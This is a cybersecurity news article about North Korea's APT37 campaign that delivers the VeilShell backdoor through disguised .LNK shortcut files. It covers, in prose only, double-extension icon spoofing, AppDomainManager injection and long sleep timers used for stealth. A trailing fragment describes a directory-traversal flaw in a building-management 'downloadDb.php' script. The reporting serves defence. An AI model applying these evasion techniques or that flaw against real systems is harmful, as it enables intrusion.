In terms of the infection routine, a Shrouded#Sleep infection begins, like many others do, with a .ZIP archive containing a Windows shortcut (.LNK) file.

"It's incredibly common — if you were to throw a dart at the threat actor dartboard, a shortcut file is probably going to be hit," says Tim Peck, senior threat researcher at Securonix. "It's easy, it's effective. It pairs really well with phishing emails. And it's easy to mask."

Windows hides the .LNK file extension by default, substituting it with a little arrow in the bottom left hand corner of a file's icon, making for an overall cleaner user interface. The upshot is that attackers like APT37 can swap a .LNK's default icon with another of their choosing, and use double extensions to hide the true nature of the file.

APT37 gives its shortcut files PDF and Excel icons, and assigned them double extensions like ".pdf.lnk," or ".xls.lnk," so that only the .PDF and .XLS parts of the extension show up for users.

Related:UAE, Saudi Arabia Become Plum Cyberattack Targets

In the end, Peck notes, "Unless you're looking for the little arrow that Microsoft adds on shortcut files, odds are you might miss that." An unreasonably eagle-eyed victim might also have noticed that unlike typical shortcut files — which tend to be just a few kilobytes in size — these were anywhere from 60 to 600 kilobytes.

Contained within those kilobytes was APT37's malicious payload, which Securonix has named "VeilShell." 

**VeilShell's Patient Persistence**

The SHROUDED#SLEEP campaign is notable for its state-of-the-art blend of living-off-the-land and proprietary tools, plus impressive persistence and stealth mechanism.

"It represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems," according to the Securonix analysis. "Throughout this investigation, we have shown how the threat actors methodically crafted their payloads and made use of an interesting combination of legitimate tools and techniques to bypass defenses and maintain access to their targets."

Related:China's 'Earth Baxia' Spies Exploit Geoserver to Target APAC Orgs

VeilShell for instance is a multifunctional, PowerShell-based backdoor-plus-remote-access-trojan (RAT). It's capable of all the things RATs tend to do: download and upload files, modify and delete existing files on the system, modify system settings, create scheduled tasks for persistence, etc.

Notably, APT37 also achieves persistence via AppDomainManager injection, a rarer technique involving the injection of malicious code into .NET applications.

All of these malicious functions and techniques might otherwise make a lot of noise on targeted systems, so APT37 uses some tricks to provide counterbalance. For example, it implements long sleep timers to break up different stages of the attack chain, ensuring that malicious activities don't occur in obvious succession.

As Peck tells it, "The threat actors were incredibly patient, slow, and methodical. They used a lot of long sleep timers — we're talking, like, 6,000 seconds in between different attack stages. And the main goal \[of the shortcut file\] was to set the stage. It didn't actually execute any malware. It dropped the files into a location that would allow them to execute on their own on the next system reboot. That reboot could be the same day, or a week from now, depending on how the user uses their PC."

It was emblematic, perhaps, of a threat actor with confidence and patience to spare. "A lot of times we see these dive in, dive out types of campaigns. But this was definitely designed with stealth in mind," he says.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK's APT37 Targets Cambodia With Khmer, 'VeilShell' Backdoor

The building management system suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'downloadDb.php' script is not properly verified before being used to download database files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

Tag

#auth